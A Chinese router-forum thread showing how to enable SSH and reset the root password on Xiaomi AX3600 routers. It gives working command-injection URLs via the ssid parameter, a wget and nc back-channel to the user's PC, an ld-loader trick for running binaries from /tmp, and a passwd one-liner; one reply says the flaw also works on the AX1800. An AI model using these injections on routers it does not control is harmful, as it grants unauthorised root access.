找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888
查看: 29687|回复: 49

[AX3600] 【更新:一行命令搞定】AX3600开启SSH兼修改密码

  [复制链接]
发表于 2020-5-29 09:42 | 显示全部楼层 |阅读模式
本帖最后由 高渐离 于 2020-5-29 10:43 编辑

关于注入这一方面,@LonGDikE 已经说的很清楚了,这里我就不再赘述,我就专门讲讲修改密码的部分。另外这里提供一个简单的一步到位命令:
  1. http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bsed%20-i%20's/channel=.*/channel=%5C%22debug%5C%22/g'%20/etc/init.d/dropbear%3B
复制代码
  1. http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B
复制代码
之后执行就行


不好意思,我想多了。我没想到小米这个环境竟然直接提供了passwd命令,感谢@lstions 的提醒,大家直接passwd就行了
  1. echo -e "admin\nadmin" | passwd root;
复制代码
我也是吐了,因为之前不管是自己编译的还是官方的都是没有passwd这个命令的。。。我是真的没想到


需求:一台电脑,安装了python环境(有别的http服务器也行)

  • 下载附件的zip,解压
  • 打开上面解压得到的目录,在当前目录执行
    1. python3 -m http.server --bind 0.0.0.0
    复制代码

  • 然后执行以下代码:(以下所有的执行代码均按照https://www.right.com.cn/forum/thread-4032490-1-1.html帖子所叙方法进行encode,下同)
    1. cd /tmp&&wget <电脑ip>:8000/chpasswd
    复制代码

  • 如果观察到第2步的窗口中出现GET字样说明执行成功
  • 接下来通过chpasswd执行命令就行了

如果不确定是否下载成功,可以执行
  1. ls -l /tmp|nc 电脑ip 1999
复制代码
然后电脑运行:

  1. nc -lvvp 1999
复制代码
就可以接收命令的回显



你以为就这么简单吗?然后你会发现根目录只读,/tmp目录下无法设置执行权限
所以接下来就是重头戏:
  1. echo root:<新密码>|/lib/ld-musl-aarch64.so.1 /tmp/chpasswd
复制代码

这个技术叫做ld执行
运行完之后你就会发现密码已经成功修改了:

接下来不用再去用上面麻烦的nc反弹shell了,直接ssh起飞




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
发表于 2020-5-29 09:46 | 显示全部楼层
本帖最后由 prunes81485216 于 2020-5-29 09:48 编辑

我等菜鸟只能望洋兴叹,仰望各位大佬!牛逼的恩山牛逼的技术大佬!膜拜膜拜!
回复 支持 反对

使用道具 举报

发表于 2020-5-29 09:46 来自手机 | 显示全部楼层
大神们研究下ax1800吧

点评

标记一下,让更多人看到:AX1800完全一样的操作,一次成功!最新版1.0.328依然存在这个漏洞,可以直接开SSH、改密码。感谢高渐离、longdike等几位大神!  发表于 2020-6-7 10:38
回复 支持 反对

使用道具 举报

发表于 2020-5-29 09:50 来自手机 | 显示全部楼层
看下。。。。。。
回复 支持 反对

使用道具 举报

发表于 2020-5-29 09:53 | 显示全部楼层
chom命令?
回复 支持 反对

使用道具 举报

发表于 2020-5-29 09:54 | 显示全部楼层
膜拜大佬zsbd
回复 支持 反对

使用道具 举报

发表于 2020-5-29 09:55 | 显示全部楼层
666,大佬牛逼
回复 支持 反对

使用道具 举报

发表于 2020-5-29 10:07 | 显示全部楼层
条条大路通罗马
回复 支持 反对

使用道具 举报

发表于 2020-5-29 10:07 | 显示全部楼层
666666666666666666666
回复 支持 反对

使用道具 举报

发表于 2020-5-29 10:09 | 显示全部楼层
支持支持!等固件了
回复 支持 反对

使用道具 举报

发表于 2020-5-29 10:33 | 显示全部楼层
接下来不用再去用上面麻烦的nc反弹shell了,直接ssh起飞
回复 支持 反对

使用道具 举报

发表于 2020-5-29 10:35 | 显示全部楼层
emmmmm,可以直接注入改密码。 注入 echo -e "admin\nadmin" | passwd root;

点评

???woc竟然真的有passwd这个命令。我直接默认没这个命令开始搞的  详情 回复 发表于 2020-5-29 10:39
回复 支持 反对

使用道具 举报

发表于 2020-5-29 10:37 | 显示全部楼层
AX3600价格起飞
回复 支持 反对

使用道具 举报

发表于 2020-5-29 10:39 | 显示全部楼层
感谢楼主分享
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-5-29 10:39 | 显示全部楼层
lstions 发表于 2020-5-29 10:35
emmmmm,可以直接注入改密码。 注入 echo -e "admin\nadmin" | passwd root;

???woc竟然真的有passwd这个命令。我直接默认没这个命令开始搞的

点评

我说你一开始搞这么复杂干啥,哈哈  详情 回复 发表于 2020-5-29 12:32
我也是看到 LonGDikE 帖子 的7楼才知道的,不过小米系列以前url就能更改系统账号密码想必大概率也是有passwd命令。  详情 回复 发表于 2020-5-29 11:11
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2024-6-7 16:07

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com

快速回复 返回顶部 返回列表